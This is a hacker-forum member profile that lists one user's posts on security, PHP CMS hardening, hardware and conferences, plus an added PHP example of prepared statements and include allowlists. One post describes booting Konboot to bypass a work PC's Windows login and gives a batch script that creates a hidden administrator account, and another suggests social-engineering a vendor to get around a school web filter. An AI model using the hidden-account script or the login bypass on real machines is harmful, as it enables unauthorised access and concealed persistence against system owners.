Trikk

Members
  • Content count

    348

Community Reputation

5 Neutral

About Trikk

  • Rank
    SUPR3M3 31337 Mack Daddy P1MP

Contact Methods

  • AIM hella steezy
  • Website URL http://www.vendettanetworking.com
  • ICQ 0

Profile Information

  • Gender Male
  • Interests h4x1n
  • Country United States
  • Location Portland, OR
  1. Help with a Communistic-security level school network?

    If it has a whitelist, and will only access the websites in that whitelist, there is nothing you can really do =/ If all else fails, their phone number on their website is listed as 877.369.8686. Call them, tell them you picked one of these guys up, and tell them you are facing some sort of issue with the unit. Just ask them a ton of questions, eventually you can get enough info to circumvent the product I'm sure. EDIT: They are laptops.. do you guys get to take them home? This is very important.
  2. CMS Security

    Well, first off, NEVER trust user input. When inserting records into a MySQL database, always sanitize the input by using mysql_real_escape_string (http://php.net/manual/en/function.mysql-real-escape-string.php). Also, when using $_POST[] or $_GET[], you need to sanitize that input as well by using stripslashes, or such. Incorporating this into any code you do will help you tremendously.

    Another thing is, since you are building a CMS, apart from just password protecting the admin page, be sure to use an htaccess. The htaccess should only allow by certain IPs you own. Example of .htaccess:

        AuthUserFile /home/test/.htpasswd
        AuthGroupFile /dev/null
        AuthName "Administrative Portal"
        AuthType Basic
        # No <Limit GET> wrapper: it would leave POST and other methods unrestricted.
        # "Satisfy all" requires a listed IP AND a valid login ("any" accepts either).
        Satisfy all
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1
        Allow from 221.23.249.294
        Require valid-user

    You must place this .htaccess in the directory of your CMS admin page/directory. This will only allow the IPs listed to access your admin page.

    Another thing is, when you include files, don't do something like the following:

        <?php include($includedir."/config.php"); ?>

    If your PHP config is not config'd properly, someone can do an include on your website and use a PHP shell to take over your website as well as your server. These are the basics, I hope it helps. If anyone has anything else to add, please do.
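
The two code-level points in the post above (untrusted input reaching SQL, and include paths built from a variable a request can influence), as an added example that is not part of the original post. It swaps in PDO prepared statements for mysql_real_escape_string, since the mysql_* extension was removed in PHP 7, and an allowlist with fixed `__DIR__`-based paths for the include; the table, column and page names are hypothetical, and in-memory SQLite stands in for MySQL so it runs offline.

```php
<?php
// Added example (not from the original post). Table, column and page names
// are hypothetical; SQLite in memory stands in for MySQL so this runs offline.

// 1. Bound parameters instead of escaping: the value never becomes SQL text.
function save_post(PDO $db, string $title, string $body): int
{
    $stmt = $db->prepare('INSERT INTO posts (title, body) VALUES (:title, :body)');
    $stmt->execute([':title' => $title, ':body' => $body]);
    return (int) $db->lastInsertId();
}

// 2. Include by allowlist: the request only selects a key; the path on disk
//    is fixed in code, so neither a URL nor "../" can reach include().
const PAGES = [
    'home'     => 'pages/home.php',
    'articles' => 'pages/articles.php',
];

function resolve_page(string $requested): string
{
    if (!array_key_exists($requested, PAGES)) {
        // Unknown key: fall back to a known page, never splice it into a path.
        return __DIR__ . '/' . PAGES['home'];
    }
    return __DIR__ . '/' . PAGES[$requested];
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');

// Constructed hostile input: concatenated into SQL it would end the statement
// early; as a bound parameter it is stored as an ordinary title.
$hostile = "x'); DROP TABLE posts; --";
$id = save_post($db, $hostile, 'body text');

// Read the row back and compare what was stored with what was sent.
$stmt = $db->prepare('SELECT title FROM posts WHERE id = :id');
$stmt->execute([':id' => $id]);
var_dump($stmt->fetchColumn() === $hostile);

// Constructed request values, as they might arrive in $_GET['page'].
foreach (['articles', '../../config', 'http://example.test/remote.txt'] as $page) {
    echo $page, ' => ', resolve_page($page), PHP_EOL;
}
```
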
  3. How to hack a computer on same router

    Do you have a receipt of the computer you are trying to "hack" into, as well as a receipt for the internet access it is utilizing? If so, post it, and we will gladly help you. If not, this is illegal, and we do not condone this.
  4. SpyEye

    All versions that I know of for SpyEye and Zeus are backdoored. Wouldn't trust this.
  5. Android Call Encryption

    Reverse engineering it, as in you've seen one? Do you have any links or references to such a device or software?
  6. 360/503

    There was a 2600 meeting at Backspace Cafe but, as far as I remember, no one ever shows up. Great cafe though, good place to game. I'd be down for starting one up, as I'm in the 503 area.
  7. That paper I mentioned...

    I liked it, and felt that it was a very good read. However, most of it is presumably standard to 95% of people on this board; it's definitely something to recommend to non-tech-savvy people. I liked how you first explained to them how the network is actually a network and what each layer does, as most people do not do that. But if you're going to go that in-depth about the network itself, you might as well give a demonstration on how attackers can compromise your system, and how they do it, if you don't do X, Y, Z. Just my two cents. I rarely come across any good reads on network security. Also, if anyone is reading this and has come across some good papers on network security, pref. more advanced, please paste the links!
  8. is there such a thing as too much power?

    Just because it's a 1000W power supply, doesn't mean it's more powerful than a 650W or a 500W and can still under-power your electronics. Consider reading up on the rails of the power supply, and read user reviews. I remember having a power supply come in for Black Friday that all of our customers went crazy for, because it was a 1000W power supply for an extremely cheap price. The week after, we had daily returns of it for under-powering their stuff based on the fact that it had really crappy rails.
  9. Sniffing Logon Details On Network

    Just be straight up about it and ask her. Also, if you feel uncomfortable enough to crawl the deep dark interwebz in search of a forum of intellectual computer enthusiasts to help you steal login credentials, that should have been an immediate red flag to end the relationship with her. No trust, no relationship. Keep her around as an occasional bang IMO. EDIT: Also, as much as people here would like to help you.. giving such information to you about gaining unauthorized login credentials is against what this community believes in. As a result, you won't get any posts that you were expecting. Hire a private investigator if you really wanna know the truth
  10. I am GOD!

  11. DEFCON 18

    I'm going from July 29th to August 2nd. Have there been previous BinRev meet-ups? Does anyone have a map or such on the Riviera where we can designate a spot and time?
  12. conference for a noob

    *cough* http://www.freemagicconference.com/
  13. passing my own values to a PHP based site?

    When you select your entry, it sends back a method of either a POST or a GET. What you need to do is view the source, and check if it's being sent a POST or GET request, and action is what script the values are being sent to. Once you have that, you simply craft the POST or GET and send it to the script. For more info: http://www.tizag.com/phpT/postget.php
  14. Exploring Work Computers w/Knoppix

    I wouldn't recommend using Knoppix on a work computer. In fact, I wouldn't recommend tampering with the computer at all. However, if you got permission, this is what I would do.

    First off, if someone sees a penguin on the screen, chances are they will question what it is. I wouldn't suggest using Knoppix. You'll just attract attention to yourself. Use a program called Konboot, it will allow you to pop the CD in and continue with loading Windows, however, it re-writes the SAM file temporarily on-the-fly so that you can use any password to login. Once you're logged in as administrator, make your own account, and hide it. This is an example created by IllWill over @ illmob:

        @echo off
        net user illwill password /add && net localgroup administrators illwill /add
        echo Windows Registry Editor Version 5.00> c:\hide.reg
        echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
        echo "illwill"=dword:00000000>> c:\hide.reg
        REGEDIT /S c:\hide.REG
        DEL /Q c:\hide.REG
        Exit

    This will create the user "illwill" with the password "password" as an administrator and hide it from the user login. After that, do as you must. If it's on a network, Wireshark might be a good start. Again, I must warn you though, if you don't have permission, it's really not worth it..
  15. WebM (VP8) Video Codec for HTML5 video tag

    Firefox development builds already have it. Chrome developer preview builds should be available on May 24th. Opera also has developer builds. Awesome! After I found out about using HTML5 video I tried searching to get a copy but everywhere required a hefty payment in order to use their version. The benefits of HTML5 are going to be insane for web development! Thanks for the post.